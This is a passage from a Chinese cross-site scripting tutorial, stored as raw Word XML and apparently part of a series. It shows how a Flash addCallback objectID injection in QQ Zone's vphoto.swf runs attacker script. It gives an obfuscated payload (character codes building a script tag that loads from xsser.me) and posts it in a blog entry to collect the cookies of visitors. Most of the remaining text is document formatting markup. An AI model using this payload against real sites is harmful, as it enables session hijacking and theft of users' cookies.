    <w:p w:rsidR="003E762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且http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf中存在一句</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E762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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ExternalInterface.addC</w:t>
      </w:r>
      <w:r w:rsidR="003E762A" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>allback(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003E762A" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"myfunc",funcInFlash);</w:t>
      </w:r>
    </w:p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则有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F7A62" w:rsidRPr="009C207F" w:rsidTr="006F7A62">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="006F7A62" w:rsidRPr="009C207F" w:rsidRDefault="006F7A6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objectID="aaaa";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006F7A62" w:rsidRPr="009C207F" w:rsidRDefault="006F7A62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functionName="myfunc";</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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代入上面那句_evalJS中，则有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0544C" w:rsidRPr="009C207F" w:rsidTr="0060544C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="0060544C" w:rsidRPr="009C207F" w:rsidRDefault="006054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__flash__addCallback(document.getElementById("aaaa"),"myfunc");</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="003E762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7.那么我们可以想象一下，如果aaaa替换为</w:t>
      </w:r>
      <w:r w:rsidR="003E762A" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>aaaa"),alert(1),("</w:t>
      </w:r>
    </w:p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则上面代码变为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0544C" w:rsidRPr="009C207F" w:rsidTr="0060544C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="0060544C" w:rsidRPr="009C207F" w:rsidRDefault="006054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__flash__addCallback(document.getElementById("aaaa"),alert(1),(""),"myfunc");</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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解析：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005440EB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37FC12CD" wp14:editId="5C6A0442">
            <wp:extent cx="5715000" cy="1019175"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="113" name="图片 113" descr="104.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId2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04.jpg">
                      <a:hlinkClick r:id="rId2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3A" w:rsidRPr="009C207F" w:rsidRDefault="005440EB" w:rsidP="00A15A13">
      <w:pPr>
        <w:jc w:val="center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图</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ 图 \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A15A13">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>110</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p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8.且FLASH中，确实未对objectID做任何过滤。基于以上内容，我们可以构建利用代码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0544C" w:rsidRPr="009C207F" w:rsidTr="0060544C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="0060544C" w:rsidRPr="009C207F" w:rsidRDefault="006054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objectid='aaaa"),alert(1),("'width="100%"height="100%"align="middle"classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"type="application/x-shockwave-flash"&gt;&lt;PARAMNAME="Movie"VALUE="http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf"&gt;&lt;PARAMNAME="Src"VALUE="http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf"&gt;&lt;PARAMNAME="AllowScriptAccess"VALUE="always"&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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我们自己用上面这段代码先在自己网站上测试下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005440EB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A32443F" wp14:editId="257110C9">
            <wp:extent cx="5715000" cy="3848100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="112" name="图片 112" descr="105.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId2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105.jpg">
                      <a:hlinkClick r:id="rId2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3A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11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582C8C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看，果然id里的代码被执行了！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00582C8C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9.利用以上原理，接着我们在QQ空间里来做测试，至于FLASH么，就是现成的！</w:t>
      </w:r>
    </w:p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虽然这个FLASH里没有缺陷，但是存在addCallback的调用，我们就可以直接用它。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a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522"/>
      </w:tblGrid>
      <w:tr w:rsidR="0060544C" w:rsidRPr="009C207F" w:rsidTr="0060544C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="0060544C" w:rsidRPr="009C207F" w:rsidRDefault="0060544C" w:rsidP="009C2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C207F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>&lt;objectwidth="100%"height="100%"align="middle"id="xsstest1&amp;quot),(function(){if(!window.__x){window.__x=1;window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,120,115,115,101,114,46,109,101,47,66,113,112,57,82,121);document.body.appendChild(window.s);}})(),(&amp;quot;"classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"type="application/x-shockwave-flash"&gt;&lt;PARAMNAME="Movie"VALUE="http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf"&gt;&lt;PARAMNAME="Src"VALUE="http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf"&gt;&lt;PARAMNAME="AllowScriptAccess"VALUE="always"&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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发布日志，使用以上代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005440EB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D9DB812" wp14:editId="26AB8E91">
            <wp:extent cx="5715000" cy="2352675"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="111" name="图片 111" descr="106.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId2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106.jpg">
                      <a:hlinkClick r:id="rId2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3A" w:rsidRPr="009C207F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12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E74D3A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szCs w:val="21"/>
        </w:rPr>
        <w:t>10.当用户访问含有XSS代码的日志后，我们可以在xsser.me查看所记录的cookies内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005440EB" w:rsidRPr="009C207F" w:rsidRDefault="00E74D3A" w:rsidP="009C207F">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E89061A" wp14:editId="09BBDA7B">
            <wp:extent cx="5715000" cy="2743200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="110" name="图片 110" descr="107.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId2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107.jpg">
                      <a:hlinkClick r:id="rId2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3A" w:rsidRDefault="005440EB" w:rsidP="00A15A13">
      <w:pPr>
        <w:pStyle w:val="a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C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>图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C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ 图 \* ARABIC </w:instrTex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15A13">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>113</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F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A15A13" w:rsidRPr="00375475" w:rsidRDefault="00A15A13" w:rsidP="00A15A13">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00375475">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(连载中)责任编辑：</w:t>
      </w:r>
      <w:r w:rsidR="00375475" w:rsidRPr="00375475">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>x1aoh4i</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00A15A13" w:rsidRPr="00375475" w:rsidSect="00A31B4C">
      <w:headerReference w:type="default" r:id="rId224"/>
      <w:footerReference w:type="default" r:id="rId2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D0" w:rsidRDefault="007376D0" w:rsidP="008E7BF2">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="007376D0" w:rsidRDefault="007376D0" w:rsidP="008E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27202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A2931" w:rsidRDefault="00DA2931" w:rsidP="00DF5100">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="1750" w:firstLine="3150"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia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475">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>7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475">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>7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  <w:p w:rsidR="00DA2931" w:rsidRDefault="00DA29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D0" w:rsidRDefault="007376D0" w:rsidP="008E7BF2">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="007376D0" w:rsidRDefault="007376D0" w:rsidP="008E7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31" w:rsidRPr="00DF5100" w:rsidRDefault="00DA2931" w:rsidP="008E7BF2">
    <w:pPr>
      <w:pStyle w:val="a6"/>
    </w:pPr>
  </w:p>
  <w:p w:rsidR="00DA2931" w:rsidRPr="00C32700" w:rsidRDefault="00DA2931" w:rsidP="00065EE0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955"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3424D1F4"/>
    <w:lvl w:ilvl="0" w:tplc="29C241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76734"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BFC45D12"/>
    <w:lvl w:ilvl="0" w:tplc="65A4C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43CE1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AEB60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E01F3A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A1F249E8"/>
    <w:lvl w:ilvl="0" w:tplc="510CB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096C75"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EF042A50"/>
    <w:lvl w:ilvl="0" w:tplc="BA36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381396"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4B70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34B03"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F5660814"/>
    <w:lvl w:ilvl="0" w:tplc="8DEA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FB61AC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A5EE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F0CB2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5500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D4C09"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1F9C0534"/>
    <w:lvl w:ilvl="0" w:tplc="C7B6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6E5478"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A07AFC14"/>
    <w:lvl w:ilvl="0" w:tplc="30E4F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0C3538"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B286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97FAD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1DAE19D0"/>
    <w:lvl w:ilvl="0" w:tplc="898EA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AF5E7B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C692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C43E5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="79588992"/>
    <w:lvl w:ilvl="0" w:tplc="30E4F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D3356A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6068F91E"/>
    <w:lvl w:ilvl="0" w:tplc="D5F4A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1869BB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0AC44518"/>
    <w:lvl w:ilvl="0" w:tplc="23CE046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F66F3E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C820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51B7C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F5DEE810"/>
    <w:lvl w:ilvl="0" w:tplc="3AEC0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0930B9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D696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491818"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="571C3106"/>
    <w:lvl w:ilvl="0" w:tplc="5052A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787F85"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="097AD1F4"/>
    <w:lvl w:ilvl="0" w:tplc="5BEE1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C95B04"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="90FEC218"/>
    <w:lvl w:ilvl="0" w:tplc="A698AE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E97A9E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="99A0099A"/>
    <w:lvl w:ilvl="0" w:tplc="178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8733AF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DECC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12749"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="344814E0"/>
    <w:lvl w:ilvl="0" w:tplc="30E4F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140018D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4D88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525881"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="50B0D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5603B3D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CC52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EA5EA1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="41608B3E"/>
    <w:lvl w:ilvl="0" w:tplc="BBB6A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EB3BFC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F54E6DC2"/>
    <w:lvl w:ilvl="0" w:tplc="5052A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22"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="18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E1"/>
    <w:rsid w:val="00010938"/>
    <w:rsid w:val="000472E1"/>
    <w:rsid w:val="00065EE0"/>
    <w:rsid w:val="0008508B"/>
    <w:rsid w:val="000B2C18"/>
    <w:rsid w:val="000C6FFB"/>
    <w:rsid w:val="000E219D"/>
    <w:rsid w:val="001019E3"/>
    <w:rsid w:val="001131C4"/>
    <w:rsid w:val="001443B2"/>
    <w:rsid w:val="001860A4"/>
    <w:rsid w:val="0019187A"/>
    <w:rsid w:val="0019368A"/>
    <w:rsid w:val="001C51B3"/>
    <w:rsid w:val="001E5217"/>
    <w:rsid w:val="001F506E"/>
    <w:rsid w:val="00226772"/>
    <w:rsid w:val="00246D14"/>
    <w:rsid w:val="00262143"/>
    <w:rsid w:val="00275ADC"/>
    <w:rsid w:val="0028158C"/>
    <w:rsid w:val="00297FAA"/>
    <w:rsid w:val="002D32F2"/>
    <w:rsid w:val="002E2ED7"/>
    <w:rsid w:val="002E6C4A"/>
    <w:rsid w:val="002F5492"/>
    <w:rsid w:val="00317B99"/>
    <w:rsid w:val="00317FA7"/>
    <w:rsid w:val="00324EFF"/>
    <w:rsid w:val="003269C0"/>
    <w:rsid w:val="0033471B"/>
    <w:rsid w:val="003410E9"/>
    <w:rsid w:val="00344120"/>
    <w:rsid w:val="00345690"/>
    <w:rsid w:val="003620E6"/>
    <w:rsid w:val="003752D3"/>
    <w:rsid w:val="00375475"/>
    <w:rsid w:val="00376506"/>
    <w:rsid w:val="003B0F63"/>
    <w:rsid w:val="003C23C9"/>
    <w:rsid w:val="003C67DA"/>
    <w:rsid w:val="003D788D"/>
    <w:rsid w:val="003E762A"/>
    <w:rsid w:val="003F3C9A"/>
    <w:rsid w:val="003F48ED"/>
    <w:rsid w:val="00400F2C"/>
    <w:rsid w:val="00414B8A"/>
    <w:rsid w:val="004315A4"/>
    <w:rsid w:val="00436F75"/>
    <w:rsid w:val="00437EE1"/>
    <w:rsid w:val="00462E8B"/>
    <w:rsid w:val="00486F26"/>
    <w:rsid w:val="004D4625"/>
    <w:rsid w:val="004E0A33"/>
    <w:rsid w:val="004E16C8"/>
    <w:rsid w:val="004E6748"/>
    <w:rsid w:val="00502700"/>
    <w:rsid w:val="00507804"/>
    <w:rsid w:val="0051085E"/>
    <w:rsid w:val="00524677"/>
    <w:rsid w:val="0053106D"/>
    <w:rsid w:val="005440EB"/>
    <w:rsid w:val="00572BC3"/>
    <w:rsid w:val="00582C8C"/>
    <w:rsid w:val="00591F4A"/>
    <w:rsid w:val="00593255"/>
    <w:rsid w:val="005A02DB"/>
    <w:rsid w:val="005A5C10"/>
    <w:rsid w:val="005B5248"/>
    <w:rsid w:val="005C0FE6"/>
    <w:rsid w:val="005C3D9B"/>
    <w:rsid w:val="005E037D"/>
    <w:rsid w:val="005E4EE1"/>
    <w:rsid w:val="005F35E3"/>
    <w:rsid w:val="00604B69"/>
    <w:rsid w:val="0060544C"/>
    <w:rsid w:val="00605E0F"/>
    <w:rsid w:val="00615ACB"/>
    <w:rsid w:val="00616EE9"/>
    <w:rsid w:val="006232DB"/>
    <w:rsid w:val="00627548"/>
    <w:rsid w:val="00635347"/>
    <w:rsid w:val="006526A7"/>
    <w:rsid w:val="006545C0"/>
    <w:rsid w:val="00672B46"/>
    <w:rsid w:val="00674C63"/>
    <w:rsid w:val="006B0D40"/>
    <w:rsid w:val="006D01AD"/>
    <w:rsid w:val="006D0AB5"/>
    <w:rsid w:val="006D5E82"/>
    <w:rsid w:val="006E1618"/>
    <w:rsid w:val="006E7805"/>
    <w:rsid w:val="006F7A62"/>
    <w:rsid w:val="00702677"/>
    <w:rsid w:val="007304B4"/>
    <w:rsid w:val="007376D0"/>
    <w:rsid w:val="00755F50"/>
    <w:rsid w:val="00775CDF"/>
    <w:rsid w:val="00775D65"/>
    <w:rsid w:val="007A2497"/>
    <w:rsid w:val="007E1A05"/>
    <w:rsid w:val="007E6AFC"/>
    <w:rsid w:val="007F2BED"/>
    <w:rsid w:val="00830DD8"/>
    <w:rsid w:val="00836C4C"/>
    <w:rsid w:val="00842364"/>
    <w:rsid w:val="00872663"/>
    <w:rsid w:val="0089531A"/>
    <w:rsid w:val="008A099F"/>
    <w:rsid w:val="008B097B"/>
    <w:rsid w:val="008B1341"/>
    <w:rsid w:val="008D5523"/>
    <w:rsid w:val="008E08B7"/>
    <w:rsid w:val="008E1949"/>
    <w:rsid w:val="008E2B4F"/>
    <w:rsid w:val="008E7BF2"/>
    <w:rsid w:val="00904112"/>
    <w:rsid w:val="00907EC1"/>
    <w:rsid w:val="00924401"/>
    <w:rsid w:val="009322B2"/>
    <w:rsid w:val="00932885"/>
    <w:rsid w:val="00932DF1"/>
    <w:rsid w:val="009415F6"/>
    <w:rsid w:val="00961B4D"/>
    <w:rsid w:val="00971044"/>
    <w:rsid w:val="00971259"/>
    <w:rsid w:val="00981DE3"/>
    <w:rsid w:val="00991883"/>
    <w:rsid w:val="009A6E70"/>
    <w:rsid w:val="009C207F"/>
    <w:rsid w:val="009C7E84"/>
    <w:rsid w:val="009D2FD3"/>
    <w:rsid w:val="009E1306"/>
    <w:rsid w:val="009F4319"/>
    <w:rsid w:val="00A031F5"/>
    <w:rsid w:val="00A15A13"/>
    <w:rsid w:val="00A2243C"/>
    <w:rsid w:val="00A276C3"/>
    <w:rsid w:val="00A31B4C"/>
    <w:rsid w:val="00A4448E"/>
    <w:rsid w:val="00A717C6"/>
    <w:rsid w:val="00A8236E"/>
    <w:rsid w:val="00AB7797"/>
    <w:rsid w:val="00AD0511"/>
    <w:rsid w:val="00AD0811"/>
    <w:rsid w:val="00AF0D33"/>
    <w:rsid w:val="00B27ED5"/>
    <w:rsid w:val="00B318CA"/>
    <w:rsid w:val="00B46C63"/>
    <w:rsid w:val="00B46FCB"/>
    <w:rsid w:val="00B70A1F"/>
    <w:rsid w:val="00B72102"/>
    <w:rsid w:val="00BA31DA"/>
    <w:rsid w:val="00BB7A7D"/>
    <w:rsid w:val="00BF0232"/>
    <w:rsid w:val="00BF0F10"/>
    <w:rsid w:val="00C10976"/>
    <w:rsid w:val="00C16395"/>
    <w:rsid w:val="00C32700"/>
    <w:rsid w:val="00C34BCA"/>
    <w:rsid w:val="00C352F0"/>
    <w:rsid w:val="00C52E6A"/>
    <w:rsid w:val="00C54A5D"/>
    <w:rsid w:val="00C65343"/>
    <w:rsid w:val="00C77583"/>
    <w:rsid w:val="00C90A22"/>
    <w:rsid w:val="00CB3328"/>
    <w:rsid w:val="00CC4147"/>
    <w:rsid w:val="00CC6932"/>
    <w:rsid w:val="00CC79D7"/>
    <w:rsid w:val="00CD6E8E"/>
    <w:rsid w:val="00CF60EF"/>
    <w:rsid w:val="00D07ABE"/>
    <w:rsid w:val="00D12752"/>
    <w:rsid w:val="00D130F4"/>
    <w:rsid w:val="00D2549F"/>
    <w:rsid w:val="00D62588"/>
    <w:rsid w:val="00D76552"/>
    <w:rsid w:val="00D77643"/>
    <w:rsid w:val="00D84DCF"/>
    <w:rsid w:val="00DA2931"/>
    <w:rsid w:val="00DA5473"/>
    <w:rsid w:val="00DA574E"/>
    <w:rsid w:val="00DC1D30"/>
    <w:rsid w:val="00DE496D"/>
    <w:rsid w:val="00DF5100"/>
    <w:rsid w:val="00E02FA0"/>
    <w:rsid w:val="00E060FE"/>
    <w:rsid w:val="00E17087"/>
    <w:rsid w:val="00E23B7B"/>
    <w:rsid w:val="00E328B4"/>
    <w:rsid w:val="00E4003C"/>
    <w:rsid w:val="00E57157"/>
    <w:rsid w:val="00E74D3A"/>
    <w:rsid w:val="00E77235"/>
    <w:rsid w:val="00EB7C17"/>
    <w:rsid w:val="00EC2FEC"/>
    <w:rsid w:val="00ED164C"/>
    <w:rsid w:val="00EF5C91"/>
    <w:rsid w:val="00F00FB0"/>
    <w:rsid w:val="00F2158C"/>
    <w:rsid w:val="00F23B78"/>
    <w:rsid w:val="00F41934"/>
    <w:rsid w:val="00F41CB8"/>
    <w:rsid w:val="00F55C25"/>
    <w:rsid w:val="00F76236"/>
    <w:rsid w:val="00F9345B"/>
    <w:rsid w:val="00FC1936"/>
    <w:rsid w:val="00FD7C61"/>
    <w:rsid w:val="00FE6F16"/>
    <w:rsid w:val="00FE7298"/>
    <w:rsid w:val="00FE7A66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E70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EC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907EC1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07EC1"/>
    <w:rPr>
      <w:rFonts w:ascii="Lucida Console" w:eastAsia="宋体" w:hAnsi="Lucida Console" w:cs="宋体" w:hint="default"/>
      <w:color w:val="333333"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTML0">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="HTMLChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00907EC1"/>
    <w:pPr>
      <w:widowControl/>
      <w:pBdr>
        <w:top w:val="single" w:sz="6" w:space="3" w:color="CCCCCC"/>
        <w:left w:val="single" w:sz="6" w:space="6" w:color="CCCCCC"/>
        <w:bottom w:val="single" w:sz="6" w:space="3" w:color="CCCCCC"/>
        <w:right w:val="single" w:sz="6" w:space="6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jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Lucida Console" w:eastAsia="宋体" w:hAnsi="Lucida Console" w:cs="宋体"/>
      <w:color w:val="333333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907EC1"/>
    <w:rPr>
      <w:rFonts w:ascii="Lucida Console" w:eastAsia="宋体" w:hAnsi="Lucida Console" w:cs="宋体"/>
      <w:color w:val="333333"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="detail1">
    <w:name w:val="detail1"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00907EC1"/>
    <w:pPr>
      <w:widowControl/>
      <w:wordWrap w:val="0"/>
      <w:spacing w:line="375" w:lineRule="atLeast"/>
      <w:jc w:val="left"/>
    </w:pPr>
